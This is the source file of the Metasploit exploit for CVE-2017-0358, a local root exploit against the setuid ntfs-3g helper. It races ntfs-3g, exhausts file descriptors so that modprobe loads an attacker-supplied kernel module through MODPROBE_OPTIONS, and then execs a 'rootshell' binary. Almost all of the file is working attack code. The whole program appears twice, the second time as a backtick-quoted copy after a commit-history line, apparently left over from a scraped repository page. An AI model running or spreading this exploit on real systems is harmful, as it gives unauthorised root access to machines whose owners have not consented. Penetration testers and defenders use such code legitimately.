metasploit-framework/data/exploits/CVE-2017-0358/sploit.c

#define _GNU_SOURCE
#include <stdbool.h>
#include <errno.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <err.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <signal.h>
#include <poll.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <sys/utsname.h>

int main(void) {
  /* prevent shell from backgrounding ntfs-3g when stopped */
  pid_t initial_fork_child = fork();
  if (initial_fork_child == -1)
    err(1, "initial fork");
  if (initial_fork_child != 0) {
    int status;
    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
      err(1, "waitpid");
    execl("rootshell", "rootshell", NULL);
    exit(0);
  }

  char buf[1000] = {0};
  // Set up workspace with volume, mountpoint, modprobe config and module directory.
  char template[] = "/tmp/ntfs_sploit.XXXXXX";
  if (mkdtemp(template) == NULL)
    err(1, "mkdtemp");
  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
  sprintf(volume, "%s/volume", template);
  sprintf(mountpoint, "%s/mountpoint", template);
  sprintf(modprobe_confdir, "%s/modprobe.d", template);
  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
    err(1, "mkdir");
  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
  if (conffd == -1)
    err(1, "open modprobe config");
  int suidfile_fd = open("rootshell", O_RDONLY);
  if (suidfile_fd == -1)
    err(1, "unable to open ./rootshell");
  char modprobe_config[200];
  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
    errx(1, "modprobe config write failed");
  close(conffd);
  // module directory setup
  char system_cmd[1000];
  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
    template, template);
  if (system(system_cmd))
    errx(1, "shell command failed");

  // Set up inotify watch for /proc/mounts.
  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
  // the watch will only see accesses by this process.
  int inotify_fd = inotify_init1(IN_CLOEXEC);
  if (inotify_fd == -1)
    err(1, "unable to create inotify fd?");
  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
    err(1, "unable to watch /proc/mounts");

  // Set up inotify watch for /proc/filesystems.
  // This can be used to detect whether we lost the race.
  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
  if (fs_inotify_fd == -1)
    err(1, "unable to create inotify fd?");
  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
    err(1, "unable to watch /proc/filesystems");

  // Set up inotify watch for /sbin/modprobe.
  // This can be used to detect when we can release all our open files.
  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
  if (modprobe_inotify_fd == -1)
    err(1, "unable to create inotify fd?");
  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
    err(1, "unable to watch /sbin/modprobe");

  int do_exec_pipe[2];
  if (pipe2(do_exec_pipe, O_CLOEXEC))
    err(1, "pipe");
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child != 0) {
    if (read(do_exec_pipe[0], buf, 1) != 1)
      errx(1, "pipe read failed");
    char modprobe_opts[300];
    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
  }
  child = getpid();

  // Now launch ntfs-3g and wait until it opens /proc/mounts
  if (write(do_exec_pipe[1], buf, 1) != 1)
    errx(1, "pipe write failed");

  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
    errx(1, "inotify read failed");
  if (kill(getppid(), SIGSTOP))
    err(1, "can't stop setuid parent");

  // Check whether we won the main race.
  struct pollfd poll_fds[1] = {{
    .fd = fs_inotify_fd,
    .events = POLLIN
  }};
  int poll_res = poll(poll_fds, 1, 100);
  if (poll_res == -1)
    err(1, "poll");
  if (poll_res == 1) {
    puts("looks like we lost the race");
    if (kill(getppid(), SIGKILL))
      perror("SIGKILL after lost race");
    char rm_cmd[100];
    sprintf(rm_cmd, "rm -rf %s", template);
    system(rm_cmd);
    exit(1);
  }
  puts("looks like we won the race");

  // Open as many files as possible. Whenever we have
  // a bunch of open files, move them into a new process.
  int total_open_files = 0;
  while (1) {
    #define LIMIT 500
    int open_files[LIMIT];
    bool reached_limit = false;
    int n_open_files;
    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
      open_files[n_open_files] = eventfd(0, 0);
      if (open_files[n_open_files] == -1) {
        if (errno != ENFILE)
          err(1, "eventfd() failed");
        printf("got ENFILE at %d total\n", total_open_files);
        reached_limit = true;
        break;
      }
      total_open_files++;
    }
    pid_t fd_stasher_child = fork();
    if (fd_stasher_child == -1)
      err(1, "fork (for eventfd holder)");
    if (fd_stasher_child == 0) {
      prctl(PR_SET_PDEATHSIG, SIGKILL);
      // close PR_SET_PDEATHSIG race window
      if (getppid() != child) raise(SIGKILL);
      while (1) pause();
    }
    for (int i = 0; i < n_open_files; i++)
      close(open_files[i]);
    if (reached_limit)
      break;
  }

  // Wake up ntfs-3g and keep allocating files, then free up
  // the files as soon as we're reasonably certain that either
  // modprobe was spawned or the attack failed.
  if (kill(getppid(), SIGCONT))
    err(1, "SIGCONT");

  time_t start_time = time(NULL);
  while (1) {
    for (int i=0; i<1000; i++) {
      int efd = eventfd(0, 0);
      if (efd == -1 && errno != ENFILE)
        err(1, "gapfiller eventfd() failed unexpectedly");
    }
    struct pollfd modprobe_poll_fds[1] = {{
      .fd = modprobe_inotify_fd,
      .events = POLLIN
    }};
    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
    if (modprobe_poll_res == -1)
      err(1, "poll");
    if (modprobe_poll_res == 1) {
      puts("yay, modprobe ran!");
      exit(0);
    }
    if (time(NULL) > start_time + 3) {
      puts("modprobe didn't run?");
      exit(1);
    }
  }
}
move sploit.c out to data folder 2017-04-01 00:51:33 +00:00			`#define _GNU_SOURCE`
			`#include <stdbool.h>`
			`#include <errno.h>`
			`#include <sys/inotify.h>`
			`#include <unistd.h>`
			`#include <err.h>`
			`#include <stdlib.h>`
			`#include <sys/stat.h>`
			`#include <sys/types.h>`
			`#include <fcntl.h>`
			`#include <sys/eventfd.h>`
			`#include <signal.h>`
			`#include <poll.h>`
			`#include <stdio.h>`
			`#include <sys/prctl.h>`
			`#include <string.h>`
			`#include <sys/wait.h>`
			`#include <time.h>`
			`#include <sys/utsname.h>`

			`int main(void) {`
			`/* prevent shell from backgrounding ntfs-3g when stopped */`
			`pid_t initial_fork_child = fork();`
			`if (initial_fork_child == -1)`
			`err(1, "initial fork");`
			`if (initial_fork_child != 0) {`
			`int status;`
			`if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)`
			`err(1, "waitpid");`
			`execl("rootshell", "rootshell", NULL);`
			`exit(0);`
			`}`

			`char buf[1000] = {0};`
			`// Set up workspace with volume, mountpoint, modprobe config and module directory.`
			`char template[] = "/tmp/ntfs_sploit.XXXXXX";`
			`if (mkdtemp(template) == NULL)`
			`err(1, "mkdtemp");`
			`char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];`
			`sprintf(volume, "%s/volume", template);`
			`sprintf(mountpoint, "%s/mountpoint", template);`
			`sprintf(modprobe_confdir, "%s/modprobe.d", template);`
			`sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);`
			`if (mkdir(volume, 0777) \|\| mkdir(mountpoint, 0777) \|\| mkdir(modprobe_confdir, 0777))`
			`err(1, "mkdir");`
			`int conffd = open(modprobe_conffile, O_WRONLY\|O_CREAT, 0666);`
			`if (conffd == -1)`
			`err(1, "open modprobe config");`
			`int suidfile_fd = open("rootshell", O_RDONLY);`
			`if (suidfile_fd == -1)`
			`err(1, "unable to open ./rootshell");`
			`char modprobe_config[200];`
			`sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);`
			`if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))`
			`errx(1, "modprobe config write failed");`
			`close(conffd);`
			`// module directory setup`
			`char system_cmd[1000];`
			`sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",`
			`template, template);`
			`if (system(system_cmd))`
			`errx(1, "shell command failed");`

			`// Set up inotify watch for /proc/mounts.`
			`// Note: /proc/mounts is a symlink to /proc/self/mounts, so`
			`// the watch will only see accesses by this process.`
			`int inotify_fd = inotify_init1(IN_CLOEXEC);`
			`if (inotify_fd == -1)`
			`err(1, "unable to create inotify fd?");`
			`if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)`
			`err(1, "unable to watch /proc/mounts");`

			`// Set up inotify watch for /proc/filesystems.`
			`// This can be used to detect whether we lost the race.`
			`int fs_inotify_fd = inotify_init1(IN_CLOEXEC);`
			`if (fs_inotify_fd == -1)`
			`err(1, "unable to create inotify fd?");`
			`if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)`
			`err(1, "unable to watch /proc/filesystems");`

			`// Set up inotify watch for /sbin/modprobe.`
			`// This can be used to detect when we can release all our open files.`
			`int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);`
			`if (modprobe_inotify_fd == -1)`
			`err(1, "unable to create inotify fd?");`
			`if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)`
			`err(1, "unable to watch /sbin/modprobe");`

			`int do_exec_pipe[2];`
			`if (pipe2(do_exec_pipe, O_CLOEXEC))`
			`err(1, "pipe");`
			`pid_t child = fork();`
			`if (child == -1)`
			`err(1, "fork");`
			`if (child != 0) {`
			`if (read(do_exec_pipe[0], buf, 1) != 1)`
			`errx(1, "pipe read failed");`
			`char modprobe_opts[300];`
			`sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);`
			`setenv("MODPROBE_OPTIONS", modprobe_opts, 1);`
			`execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);`
			`}`
			`child = getpid();`

			`// Now launch ntfs-3g and wait until it opens /proc/mounts`
			`if (write(do_exec_pipe[1], buf, 1) != 1)`
			`errx(1, "pipe write failed");`

			`if (read(inotify_fd, buf, sizeof(buf)) <= 0)`
			`errx(1, "inotify read failed");`
			`if (kill(getppid(), SIGSTOP))`
			`err(1, "can't stop setuid parent");`

			`// Check whether we won the main race.`
			`struct pollfd poll_fds[1] = {{`
			`.fd = fs_inotify_fd,`
			`.events = POLLIN`
			`}};`
			`int poll_res = poll(poll_fds, 1, 100);`
			`if (poll_res == -1)`
			`err(1, "poll");`
			`if (poll_res == 1) {`
			`puts("looks like we lost the race");`
			`if (kill(getppid(), SIGKILL))`
			`perror("SIGKILL after lost race");`
			`char rm_cmd[100];`
			`sprintf(rm_cmd, "rm -rf %s", template);`
			`system(rm_cmd);`
			`exit(1);`
			`}`
			`puts("looks like we won the race");`

			`// Open as many files as possible. Whenever we have`
			`// a bunch of open files, move them into a new process.`
			`int total_open_files = 0;`
			`while (1) {`
			`#define LIMIT 500`
			`int open_files[LIMIT];`
			`bool reached_limit = false;`
			`int n_open_files;`
			`for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {`
			`open_files[n_open_files] = eventfd(0, 0);`
			`if (open_files[n_open_files] == -1) {`
			`if (errno != ENFILE)`
			`err(1, "eventfd() failed");`
			`printf("got ENFILE at %d total\n", total_open_files);`
			`reached_limit = true;`
			`break;`
			`}`
			`total_open_files++;`
			`}`
			`pid_t fd_stasher_child = fork();`
			`if (fd_stasher_child == -1)`
			`err(1, "fork (for eventfd holder)");`
			`if (fd_stasher_child == 0) {`
			`prctl(PR_SET_PDEATHSIG, SIGKILL);`
			`// close PR_SET_PDEATHSIG race window`
			`if (getppid() != child) raise(SIGKILL);`
			`while (1) pause();`
			`}`
			`for (int i = 0; i < n_open_files; i++)`
			`close(open_files[i]);`
			`if (reached_limit)`
			`break;`
			`}`

			`// Wake up ntfs-3g and keep allocating files, then free up`
			`// the files as soon as we're reasonably certain that either`
			`// modprobe was spawned or the attack failed.`
			`if (kill(getppid(), SIGCONT))`
			`err(1, "SIGCONT");`

			`time_t start_time = time(NULL);`
			`while (1) {`
			`for (int i=0; i<1000; i++) {`
			`int efd = eventfd(0, 0);`
			`if (efd == -1 && errno != ENFILE)`
			`err(1, "gapfiller eventfd() failed unexpectedly");`
			`}`
			`struct pollfd modprobe_poll_fds[1] = {{`
			`.fd = modprobe_inotify_fd,`
			`.events = POLLIN`
			`}};`
			`int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);`
			`if (modprobe_poll_res == -1)`
			`err(1, "poll");`
			`if (modprobe_poll_res == 1) {`
			`puts("yay, modprobe ran!");`
			`exit(0);`
			`}`
			`if (time(NULL) > start_time + 3) {`
			`puts("modprobe didn't run?");`
			`exit(1);`
			`}`
			`}`
			`}`